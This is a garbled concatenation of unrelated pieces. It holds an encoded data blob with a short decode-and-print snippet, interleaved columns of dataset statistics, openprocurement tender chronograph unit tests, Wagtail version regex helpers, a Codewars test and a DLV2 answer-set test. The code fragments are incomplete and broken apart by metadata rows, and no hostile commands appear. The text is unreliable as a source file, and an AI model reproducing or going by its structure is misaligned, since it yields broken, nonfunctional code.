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'
# Decode the URL-safe base64 payload above and dump the raw bytes to stdout.
decoded_bytes = base64.urlsafe_b64decode(string.encode('UTF-8'))
print(decoded_bytes)
| 6,343.8
| 31,647
| 0.964658
| 1,099
| 31,719
| 27.840764
| 0.966333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170377
| 0.000221
| 31,719
| 4
| 31,648
| 7,929.75
| 0.794463
| 0
| 0
| 0
| 0
| 0.333333
| 0.997541
| 0.997383
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
2de4a46676e25a9898bcbb5e3491dd6ab8e021ee
| 78
|
py
|
Python
|
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
import pacotes_em_python, pacotes_python
pacotes_em_python()
pacotes_python()
| 19.5
| 40
| 0.871795
| 11
| 78
| 5.636364
| 0.363636
| 0.629032
| 0.483871
| 0.709677
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064103
| 78
| 4
| 41
| 19.5
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
2dfd70b552bd900ef08bd015efcaa02d1facaf54
| 15,576
|
py
|
Python
|
src/openprocurement/api/tests/chronograph.py
|
Leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | null | null | null |
src/openprocurement/api/tests/chronograph.py
|
Leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:34:47.000Z
|
2022-03-21T22:20:52.000Z
|
src/openprocurement/api/tests/chronograph.py
|
leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | 1
|
2017-08-14T08:05:31.000Z
|
2017-08-14T08:05:31.000Z
|
# -*- coding: utf-8 -*-
import unittest
from openprocurement.api.tests.base import BaseTenderWebTest, test_lots, test_bids
class TenderSwitchTenderingResourceTest(BaseTenderWebTest):
def test_switch_to_tendering_by_enquiryPeriod_endDate(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertNotEqual(response.json['data']["status"], "active.tendering")
self.set_status('active.tendering', {'status': 'active.enquiries', "tenderPeriod": {"startDate": None}})
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], "active.tendering")
def test_switch_to_tendering_by_tenderPeriod_startDate(self):
self.set_status('active.tendering', {'status': 'active.enquiries', "tenderPeriod": {}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertNotEqual(response.json['data']["status"], "active.tendering")
self.set_status('active.tendering', {'status': self.initial_status, "enquiryPeriod": {}})
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], "active.tendering")
class TenderSwitchQualificationResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_bids = test_bids[:1]
def test_switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.qualification")
self.assertEqual(len(response.json['data']["awards"]), 1)
class TenderSwitchAuctionResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_bids = test_bids
def test_switch_to_auction(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class TenderSwitchUnsuccessfulResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
def test_switch_to_unsuccessful(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
class TenderLotSwitchQualificationResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
initial_bids = test_bids[:1]
def test_switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.qualification")
self.assertEqual(len(response.json['data']["awards"]), 1)
class TenderLotSwitchAuctionResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
initial_bids = test_bids
def test_switch_to_auction(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class TenderLotSwitchUnsuccessfulResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
def test_switch_to_unsuccessful(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
self.assertEqual(set([i['status'] for i in response.json['data']["lots"]]), set(["unsuccessful"]))
class TenderAuctionPeriodResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
def test_set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"auctionPeriod": {"startDate": None}}})
self.assertEqual(response.status, '200 OK')
self.assertNotIn('auctionPeriod', response.json['data'])
class TenderLotAuctionPeriodResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
def test_set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["lots"][0]['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
self.assertEqual(response.status, '200 OK')
self.assertNotIn('auctionPeriod', response.json['data']["lots"][0])
class TenderComplaintSwitchResourceTest(BaseTenderWebTest):
def test_switch_to_pending(self):
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
tender = self.db.get(self.tender_id)
tender['complaints'][0]['dateSubmitted'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint['id'], self.tender_token), {"data": {
"status": "answered",
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
tender = self.db.get(self.tender_id)
tender['complaints'][-1]['dateAnswered'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][-1]['status'], status)
class TenderLotComplaintSwitchResourceTest(TenderComplaintSwitchResourceTest):
initial_lots = test_lots
class TenderAwardComplaintSwitchResourceTest(BaseTenderWebTest):
initial_status = 'active.qualification'
initial_bids = test_bids
def setUp(self):
super(TenderAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/tenders/{}/awards'.format(
self.tender_id), {'data': {'suppliers': [self.initial_data["procuringEntity"]], 'status': 'pending', 'bid_id': self.initial_bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
def test_switch_to_pending(self):
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
response = self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
tender = self.db.get(self.tender_id)
tender['awards'][0]['complaints'][0]['dateSubmitted'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
response = self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, self.award_id, complaint['id'], self.tender_token), {"data": {
"status": "answered",
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
tender = self.db.get(self.tender_id)
tender['awards'][0]['complaints'][-1]['dateAnswered'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][-1]['status'], status)
class TenderLotAwardComplaintSwitchResourceTest(TenderAwardComplaintSwitchResourceTest):
initial_lots = test_lots
def setUp(self):
super(TenderAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id), {'data': {
'suppliers': [self.initial_data["procuringEntity"]],
'status': 'pending',
'bid_id': self.initial_bids[0]['id'],
'lotID': self.initial_bids[0]['lotValues'][0]['relatedLot']
}})
award = response.json['data']
self.award_id = award['id']
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TenderAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchUnsuccessfulResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchUnsuccessfulResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 51.068852
| 179
| 0.656009
| 1,613
| 15,576
| 6.203968
| 0.075635
| 0.094434
| 0.137903
| 0.050365
| 0.834416
| 0.822624
| 0.818927
| 0.79994
| 0.79994
| 0.778855
| 0
| 0.015946
| 0.174628
| 15,576
| 304
| 180
| 51.236842
| 0.762446
| 0.003017
| 0
| 0.741667
| 0
| 0
| 0.207343
| 0.021643
| 0
| 0
| 0
| 0
| 0.279167
| 1
| 0.070833
| false
| 0
| 0.008333
| 0
| 0.220833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9321dbb6daf530700d56a9ac0c8fab97f59e9d76
| 430
|
py
|
Python
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 26
|
2016-01-21T00:40:25.000Z
|
2019-01-31T03:52:38.000Z
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 13
|
2019-03-13T17:54:22.000Z
|
2022-03-08T00:10:09.000Z
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 15
|
2019-04-08T10:43:14.000Z
|
2022-03-01T01:32:52.000Z
|
import re
from wagtail import __version__ as WAGTAIL_VERSION
def is_wagtail_version_more_than_equal_to_2_5():
expression = '^((2.([5-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
def is_wagtail_version_more_than_equal_to_2_0():
expression = '^((2.([0-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
| 26.875
| 84
| 0.625581
| 73
| 430
| 3.369863
| 0.30137
| 0.065041
| 0.04878
| 0.154472
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0
| 0.075949
| 0.081395
| 430
| 15
| 85
| 28.666667
| 0.546835
| 0
| 0
| 0.25
| 0
| 0.25
| 0.317016
| 0.317016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
4f082d05cc6f74fcb5cea306f7e727c15b4efdba
| 54
|
py
|
Python
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | 1
|
2019-01-24T22:17:51.000Z
|
2019-01-24T22:17:51.000Z
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | 1
|
2021-06-02T00:16:12.000Z
|
2021-06-02T00:16:12.000Z
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | null | null | null |
from file2 import data
def printout():
print(data)
| 9
| 22
| 0.722222
| 8
| 54
| 4.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.185185
| 54
| 5
| 23
| 10.8
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
879b6bc9899678f394bed531c878b084306de3e1
| 267
|
py
|
Python
|
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
test.assert_equals(relatively_prime(8, [1, 2, 3, 4, 5, 6, 7]), [1, 3, 5, 7])
test.assert_equals(relatively_prime(15, [72, 27, 32, 61, 77, 11, 40]), [32, 61, 77, 11])
test.assert_equals(relatively_prime(210, [15, 100, 2222222, 6, 4, 12369, 99]), [])
| 44.5
| 88
| 0.629213
| 51
| 267
| 3.176471
| 0.54902
| 0.185185
| 0.296296
| 0.481481
| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0
| 0.275109
| 0.142322
| 267
| 5
| 89
| 53.4
| 0.432314
| 0.052434
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87b830eb8ab6e2e9c7128e768908d2c9d6f5b5a3
| 211
|
py
|
Python
|
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
c(1).
c(2).
c(3).
a(X) | -a(X) :- c(X).
minim(X) :- a(X), #min{ D : a(D) } = X.
"""
output = """
c(1).
c(2).
c(3).
a(X) | -a(X) :- c(X).
minim(X) :- a(X), #min{ D : a(D) } = X.
"""
| 11.105263
| 40
| 0.308057
| 44
| 211
| 1.477273
| 0.25
| 0.184615
| 0.184615
| 0.123077
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0.040268
| 0.293839
| 211
| 18
| 41
| 11.722222
| 0.395973
| 0
| 0
| 0.857143
| 0
| 0.142857
| 0.84264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
